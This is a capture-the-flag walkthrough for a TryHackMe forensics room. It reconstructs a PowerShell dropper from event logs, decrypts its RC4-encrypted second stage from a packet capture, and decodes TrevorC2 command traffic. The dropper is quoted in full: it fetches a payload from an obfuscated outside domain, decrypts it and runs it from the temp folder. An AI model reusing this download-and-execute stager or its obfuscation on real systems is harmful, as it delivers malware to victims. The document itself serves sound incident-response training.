https://tryhackme.com/room/masquerade

---

# Assets

- Powershell-Operational.evtx
- traffic.pcapng

# EVTX Viewer

https://omerbenamram.github.io/evtx/

Load the `.evtx` file in the viewer above. Analyzing the verbose logs reveals the essential script block:

```powershell
$k = [System.Text.Encoding]::UTF8.GetBytes(('X9vT3pL'+'2QwE'+'8xR6'+'ZkYhC4'+'s'))  # key, split into fragments
$h = (New-Object System.Net.WebClient).DownloadString((-join('ht','tp','://','api-edg','e','cl','oud.xy','z/amd.bi','n'))) -replace ('\s'),''  # fetch hex blob, strip whitespace
$b = for($x=0; $x -lt $h.Length; $x+=2) { [Convert]::ToByte($h.Substring($x, 2), 16) }  # hex -> bytes
$s = 0..255
$j = 0
for ($i = 0; $i -lt 256; $i++) {  # KSA
    $j = ($j + $s[$i] + $k[$i % $k.Count]) % 256
    $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp
}
$i = $j = 0
$d = foreach ($byte in $b) {  # PRGA
    $i = ($i + 1) % 256
    $j = ($j + $s[$i]) % 256
    $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp
    $byte -bxor $s[($s[$i] + $s[$j]) % 256]
}
$p = $env:TEMP + '\amdfendrsr.exe'  # drop to %TEMP% and execute
[System.IO.File]::WriteAllBytes($p, $d)
Start-Process $p
```

![image-130](https://hackmd.io/_uploads/BJhuhCrTZe.png)

---

# What external domain was contacted during script execution?

Look at line 2 of the script. The URL is split across multiple strings and joined at runtime to avoid detection. Concatenate them manually and the domain becomes obvious.

---

# What encryption algorithm was used by the script?

**RC4** - you can spot it by the two-loop structure:

- **KSA** // `$s = 0..255` gets shuffled using the key
- **PRGA** // each byte gets XOR'd against `$s[($s[$i] + $s[$j]) % 256]`

The 256-byte state array plus that specific XOR operation is essentially RC4's signature.

---

# What key was used to decrypt the second-stage payload?

It's sitting right in line 1, just split across concatenated string fragments to make it slightly less obvious. Join them together and you've got your plaintext key, hardcoded as a UTF-8 byte array.

---

# What was the timestamp of the server response containing the payload?
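If you would rather script the first-stage decryption than click through CyberChef, here is a Python port of the stager's KSA/PRGA. This is an added example, not code from the room or the original writeup; the key and hex blob it runs on are constructed placeholders, so swap in the real key and the exported `amd.bin` contents.

```python
"""RC4 decryptor mirroring the KSA/PRGA of the recovered PowerShell stager.

Added example, not code from the TryHackMe room or the original writeup.
The key and hex blob are constructed placeholders, not the room's values.
"""
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR; the same function encrypts and decrypts."""
    # KSA: shuffle the 256-byte state using the key (the script's first loop)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    # PRGA: XOR each byte with s[(s[i] + s[j]) % 256] (the script's foreach)
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decrypt_hex_blob(hex_text: str, key: bytes) -> bytes:
    """Mirror the stager: drop whitespace, hex-decode, then RC4 with the key."""
    return rc4(key, bytes.fromhex(re.sub(r"\s", "", hex_text)))


def looks_like_pe(blob: bytes) -> bool:
    """The writeup's sanity check: MZ header plus the DOS stub string."""
    return blob[:2] == b"MZ" and b"This program cannot be run in DOS mode." in blob


# Constructed sample: a fake key and a fake PE-like payload, encrypted here so
# the decryptor has input to work on. The real values come from the evidence.
SAMPLE_KEY = b"constructed-key"
SAMPLE_PLAINTEXT = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n$"
SAMPLE_HEX = rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT).hex()
# Wrap the hex so the whitespace stripping (-replace '\s') is exercised too
SAMPLE_HEX_WRAPPED = "\n".join(SAMPLE_HEX[i:i + 32] for i in range(0, len(SAMPLE_HEX), 32))

if __name__ == "__main__":
    decrypted = decrypt_hex_blob(SAMPLE_HEX_WRAPPED, SAMPLE_KEY)
    print("PE header present:", looks_like_pe(decrypted))
```

To use it on the real sample, read the exported `amd.bin` as text, pass it to `decrypt_hex_blob` with the joined key from line 1 of the script, and write the result out as `program.exe`.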
Once you have the key and algorithm, export `amd.bin` from the PCAP and run it through RC4 decryption in CyberChef.

![image-131](https://hackmd.io/_uploads/HkmC2ASpbx.png)

> Input format needs to be **Hex** and the passphrase entered as **UTF-8**.

You'll know it worked when the output starts with `MZ` and has `This program cannot be run in DOS mode.` - that's a valid Windows PE.

![image-136](https://hackmd.io/_uploads/rkneaCHTWx.png)

![image-137](https://hackmd.io/_uploads/By-bTCSpbl.png)

Save it as `program.exe` and run `file` on it to confirm:

```
program.exe: PE32 executable for MS Windows 4.00 (console), Intel i386 Mono/.Net assembly, 3 sections
```

![image-138](https://hackmd.io/_uploads/BkYUa0STWg.png)

For the actual timestamp, pull the HTTP `Date` header straight from the PCAP. The header lives in the response frame, so filter on the response's request URI rather than the request itself:

```bash
# http.response_for.uri matches the response frame that carries the Date header
tshark -r traffic.pcapng -Y 'http.response_for.uri contains "amd.bin"' -T fields -e http.date
```

---

# Decompiling the .NET Binary

It's a .NET assembly so you can get pretty clean decompiled output with `ilspycmd`:

```bash
dotnet tool install -g ilspycmd
ilspycmd program.exe -o ./decompiled/
```

The source reveals it's a TrevorC2 client - an open source C2 framework that tunnels commands over HTTP to blend in with normal traffic. The C2 IP, encryption passphrase and communication stubs are all hardcoded in the binary.

---

# What is the SHA-256 hash of the extracted and decrypted payload?

```bash
sha256sum program.exe
```

![image-140](https://hackmd.io/_uploads/Syx3aCrpZg.png)

---

# What remote URL did the client use to communicate with the victim machine?

It's hardcoded in the decompiled source, used for all the HTTP GET beaconing.

![image-141](https://hackmd.io/_uploads/B15TaCraWg.png)

---

# Which encryption key and algorithm does the client use?

Both the algorithm and the passphrase used to derive the key are sitting in the decompiled source as hardcoded constants. Hard to miss.
---

# After determining the client's encryption, decrypt the commands the attacker executed on the victim and submit the flag.

First grab all the `guid` values out of the PCAP:

```bash
tshark -r traffic.pcapng -Y 'http.request.uri contains "guid"' -T fields -e http.request.uri | sed 's|/images?guid=||'
```

Then run them through this script (requires `pycryptodome`):

```python
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

# TrevorC2 derives the AES key as the SHA-256 digest of the hardcoded passphrase
key = hashlib.sha256(b"<REDACTED>").digest()

guids = [
    "<REDACTED>",
    # rest of the guid values
]

for i, g in enumerate(guids):
    try:
        # each guid is base64 applied twice over (IV || ciphertext)
        data = base64.b64decode(base64.b64decode(g))
        iv = data[:16]
        cipher = AES.new(key, AES.MODE_CBC, iv)
        result = cipher.decrypt(data[16:])
        try:
            result = unpad(result, AES.block_size)  # strip PKCS#7 padding when intact
        except ValueError:
            pass  # keep the raw plaintext if the padding doesn't validate
        print(f"[{i}] {result}")
    except Exception as e:
        print(f"[{i}] Error: {e}")
```

One of the outputs will have the flag. You'll also see what commands the attacker actually ran on the victim machine.

![image-143](https://hackmd.io/_uploads/rkR0aArTbl.png)